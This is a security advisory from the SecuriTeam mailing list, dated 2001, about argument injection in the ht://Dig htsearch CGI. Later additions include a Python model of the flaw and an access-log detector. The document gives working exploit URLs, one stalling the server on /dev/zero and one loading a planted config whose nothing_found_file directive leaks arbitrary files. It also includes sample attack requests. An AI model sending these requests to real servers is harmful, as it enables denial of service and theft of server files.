[UNIX] Security Bug Found in ht://Dig htsearch CGI (DoS, File Exposure)
From: support@securiteam.com
Date: 10/16/01
From: support@securiteam.com
To: list@securiteam.com
Subject: [UNIX] Security Bug Found in ht://Dig htsearch CGI (DoS, File Exposure)
Message-Id: <20011016170343.0FC5B138C1@mail.der-keiler.de>
Date: Tue, 16 Oct 2001 19:03:43 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Security Bug Found in ht://Dig htsearch CGI (DoS, File Exposure)
------------------------------------------------------------------------
SUMMARY
The <http://sourceforge.net/projects/htdig/> ht://Dig system is a
complete indexing and searching system for a domain or Intranet. A
security vulnerability in the product allows attackers to either cause the
program to stop responding, or to cause it to reveal the content of
sensitive files.
DETAILS
Vulnerable systems:
htDig version 3.1.0b2 and more recent, including 3.1.5 and 3.2.0b3
Immune systems:
htDig version 3.1.6 or 3.2.0b4
htsearch is a single binary that serves both as the CGI program and as a
command-line tool. On the command line it accepts -c [filename] to read an
alternate configuration file. Nothing stops that option from reaching the
CGI: a GET query string that contains no '=' is treated by the web server as
a CGI "indexed query" and is split on '+' and passed to the program as
command-line arguments, so a remote user can supply -c and make htsearch
read any file it can open as its configuration. Pointing it at a file that
never reaches end-of-file (such as /dev/zero) stalls the process until the
server times it out, a denial of service; pointing it at a file the attacker
controls makes htsearch load attacker-chosen configuration directives.
For the file-exposure case the attacker must first get a configuration file
of their own onto the host where the web server UID can read it, e.g. an
anonymous FTP area with uploads enabled, or a world-readable Samba log file
into which attacker-supplied text is written. A directive in that file then
names the file to steal: when a search matches nothing, htsearch sends the
named file's content back to the client, so any file readable by the web
server UID can be retrieved.
For example, the planted configuration file would contain the directive below; nothing_found_file names the file whose content htsearch sends to the client when a search matches nothing:
nothing_found_file: /path/to/the/file/we/steal
Exploit:
http://your.host/cgi-bin/htsearch?-c/dev/zero
http://your.host/cgi-bin/htsearch?-c/path/to/my.file
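To make the mechanism concrete, the following Python model is an added illustration written for this page; it is not htsearch's own code and not from the advisory's author. It reproduces the three pieces the advisory chains together: the CGI/1.1 indexed-query rule (a QUERY_STRING with no unencoded '=' is split on '+', URL-decoded and handed to the program as argv), a -c option that selects the configuration file, and a nothing_found_file directive whose target is read and returned to the client. The getopt-style handling of -c, the minimal "attribute: value" config reader, the GATEWAY_INTERFACE check used in the hardened variant, and every file path and sample file are assumptions made for this example. Do not point the vulnerable variant at /dev/zero: that is exactly the stall the advisory describes.

```python
"""Model of the ht://Dig htsearch '-c' exposure (added illustration, not
htsearch's code).  All paths, the config format and the sample files are
constructed here for the example."""
import os
import tempfile
from urllib.parse import unquote


def indexed_query_argv(query_string):
    """CGI/1.1 indexed query: no unencoded '=' in QUERY_STRING means the
    server splits it on '+' and passes the decoded words as argv."""
    if "=" in query_string:
        return []
    return [unquote(word) for word in query_string.split("+") if word]


def config_from_argv(argv):
    """Accept '-c<file>' or '-c <file>' like a getopt(3) 'c:' option
    (assumed shape of htsearch's option handling)."""
    config = None
    i = 0
    while i < len(argv):
        arg = argv[i]
        if arg == "-c" and i + 1 < len(argv):
            config = argv[i + 1]
            i += 1
        elif arg.startswith("-c") and len(arg) > 2:
            config = arg[2:]
        i += 1
    return config


def parse_htdig_conf(path):
    """Minimal 'attribute: value' reader, enough for the advisory's directive."""
    conf = {}
    with open(path) as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#") or ":" not in line:
                continue
            key, value = line.split(":", 1)
            conf[key.strip()] = value.strip()
    return conf


def render_no_results(conf):
    """When a search matches nothing, the nothing_found_file content is
    sent back to the client; this is the file-read primitive."""
    path = conf.get("nothing_found_file")
    if not path:
        return "No matches."
    with open(path) as fh:
        return fh.read()


def htsearch_vulnerable(query_string, default_conf):
    """Honours -c from argv even when invoked as a CGI."""
    argv = indexed_query_argv(query_string)
    conf_path = config_from_argv(argv) or default_conf
    return render_no_results(parse_htdig_conf(conf_path))


def htsearch_hardened(query_string, default_conf, environ):
    """Assumed fix shape (not the project's exact patch): when running as a
    CGI, ignore command-line arguments entirely and use the built-in config."""
    running_as_cgi = environ.get("GATEWAY_INTERFACE", "").startswith("CGI/")
    argv = [] if running_as_cgi else indexed_query_argv(query_string)
    conf_path = config_from_argv(argv) or default_conf
    return render_no_results(parse_htdig_conf(conf_path))


def demo():
    """Constructed scenario: a secret readable by the web server UID, the
    stock config, and an attacker config planted in an upload directory."""
    base = tempfile.mkdtemp()
    secret = os.path.join(base, "secret.txt")
    with open(secret, "w") as fh:
        fh.write("db_password=hunter2\n")
    default_conf = os.path.join(base, "htdig.conf")
    with open(default_conf, "w") as fh:
        fh.write("database_dir: %s\n" % base)   # no nothing_found_file set
    planted = os.path.join(base, "incoming", "my.conf")  # e.g. anon-FTP upload area
    os.makedirs(os.path.dirname(planted))
    with open(planted, "w") as fh:
        fh.write("nothing_found_file: %s\n" % secret)
    query_string = "-c" + planted      # no '=' present, so it becomes argv
    cgi_env = {"GATEWAY_INTERFACE": "CGI/1.1"}
    return {
        "argv": indexed_query_argv(query_string),
        "vulnerable": htsearch_vulnerable(query_string, default_conf),
        "hardened": htsearch_hardened(query_string, default_conf, cgi_env),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, "->", value)
```

The hardened variant refuses argv whenever GATEWAY_INTERFACE is present, which is the simplest safe rule: a CGI has no legitimate reason to take options from the request URL, and the indexed-query path is rarely wanted at all, so a server-side form that always submits `name=value` pairs (which never become argv) is a second, independent layer.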
Fix:
Upgrade to 3.1.6 or 3.2.0b4 (prerelease versions at the time of writing),
which no longer let the CGI take its configuration file from the request.
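Until the upgrade is in place, attempts are easy to spot in the access log, because a legitimate htsearch form submission always carries `name=value` pairs while an argument-injection request carries none. The detector below is an added example for this page, not part of the advisory; the Apache common-log lines it parses are constructed here, and the log regex, the path test and the returned record shape are assumptions made for the example.

```python
"""Find htsearch requests whose query string would be passed as argv
(added example; sample log lines are constructed, not real traffic)."""
import re
from urllib.parse import unquote, urlsplit

SAMPLE_LOG = """\
10.0.0.5 - - [16/Oct/2001:19:03:43 +0200] "GET /cgi-bin/htsearch?words=htdig&method=and HTTP/1.0" 200 2311
10.0.0.7 - - [16/Oct/2001:19:05:10 +0200] "GET /cgi-bin/htsearch?-c/dev/zero HTTP/1.0" 500 0
10.0.0.7 - - [16/Oct/2001:19:05:31 +0200] "GET /cgi-bin/htsearch?%2Dc/home/ftp/incoming/my.conf HTTP/1.0" 200 811
10.0.0.9 - - [16/Oct/2001:19:06:02 +0200] "GET /cgi-bin/htsearch?-c+/tmp/x.conf HTTP/1.0" 200 1204
10.0.0.9 - - [16/Oct/2001:19:06:40 +0200] "GET /index.html HTTP/1.0" 200 512
"""

# Apache common log format: host ident user [time] "request" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)


def indexed_query_argv(query_string):
    """CGI/1.1 indexed-query rule: no unencoded '=' means split on '+',
    URL-decode each word, and the words become the program's argv."""
    if "=" in query_string:
        return []
    return [unquote(word) for word in query_string.split("+") if word]


def htsearch_argv_requests(log_text):
    """Return each htsearch request that would hand an option (a word
    starting with '-') to the CGI on its command line."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        target = urlsplit(m.group("target"))
        if not target.path.endswith("/htsearch"):
            continue
        argv = indexed_query_argv(target.query)
        # Decoding happens after the '=' test, so %2Dc still counts: the
        # server only looks for an unencoded '=' when deciding on argv.
        if not any(word.startswith("-") for word in argv):
            continue
        hits.append({
            "ip": m.group("ip"),
            "ts": m.group("ts"),
            "argv": argv,
            "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    for hit in htsearch_argv_requests(SAMPLE_LOG):
        print("%(ts)s %(ip)s argv=%(argv)r status=%(status)d" % hit)
```

A 500 or a request that never logs a size is the stall case (the -c target never reached end-of-file); a 200 with a body is the one to follow up on, since it means htsearch loaded whatever configuration the URL named.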
ADDITIONAL INFORMATION
The information has been provided by <mailto:ghutchis@wso.williams.edu>
Geoff Hutchison.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
========================================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.